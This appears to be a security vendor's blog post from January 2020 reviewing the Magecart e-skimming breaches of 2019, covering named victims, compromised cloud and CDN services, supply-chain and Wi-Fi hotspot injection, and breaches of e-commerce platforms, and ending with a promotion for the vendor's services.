January 5, 2020
2019 is barely over, but it is already set the highest record of “Magecart-style” e-skimming breaches. Macy’s, Procter & Gamble, Sixth June, American Cancer Society, Baseball Hall of Fame, Smith & Wesson, Magento Marketplace, and Volusion e-commerce platform are some of the Magecart’s recent victims. E-skimming infection code was also found hosted on the Salesforce Heroku Cloud, in Amazon S3 buckets, Amazon CloudFront CDN, and other content delivery networks. Magecart skimming code was also found to be impersonating a legitimate security firm Sanguine Security as a way to disguise itself.
RiskIQ believes that more than 17,000 websites were breached by e-skimmers in 2019. A huge increase from an estimated 6,000 website breaches between 2015 and 2018, according to the 2018 report from Flashpoint and RiskIQ.
Skimmers have been actively updating their techniques. In 2019, we saw e-skimming attacks reach the highest volume and new levels of innovation and creativity. Notably, they began using legitimate cloud services like those offered by Amazon CloudFront, Salesforce Heroku, CloudCMS, Volusion, Adobe Magento, and many others. In this article, I will share some of the most notable attack trends and backdoors of the year:
Additionally, attacking third-party tools allows hackers to penetrate to almost all the customers of the target, gaining the same level of unrestricted access to the their customer’s websites and the data. Attacks based on open-source libraries and third-party code can hit thousands of companies in one shot as discovered by security researcher Willem de Groot in the Picreel and CloudCMS breaches that infected more than 4,600 websites. This type of attack is commonly called “drive-by skimming.”
Recently, Magecart-style attackers impersonated a legitimate security firm Sanguine Security to evade detection during its attack on Smith & Wesson. Sanguine Security identified and remediated it very quickly.
The catch-all type of e-skimming compromise was found on public Wi-Fi hotspots by IBM researchers. This gives attackers access to a large number of users in public spaces, including airports and hotels. Skimming code is inserted via Wi-Fi hotspots allowing theft of information from all web forms, not just checkout pages, because the compromise via Wi-Fi routers allows attackers automatically injecting skimming scripts into all websites accessed by users through those devices.
Some of the world’s most popular e-commerce platforms like Volusion and Adobe Magento Marketplace have been breached by Magecart e-skimming code. These e-commerce platforms provide checkout services for about 30,000 and 250,000 merchants respectively giving access to a massive amount of account information. Thousands of online stores have been confirmed to be compromised during the Volusion platform hack that was undetected for about a month. It’s possible that every e-commerce store on the platform might have had payment data skimmed.
For instance, Magecart used a two-stage skimming attack in the American Cancer Society website breach.
Read the next article to learn about the top three emerging trends in e-skimming and new industries that Magecart will likely attack this year.
And, if you are interested in automating your SecOps and hardening your skimming defenses please don’t hesitate to check our site www.feroot.com and feel free to ask questions or ask for help.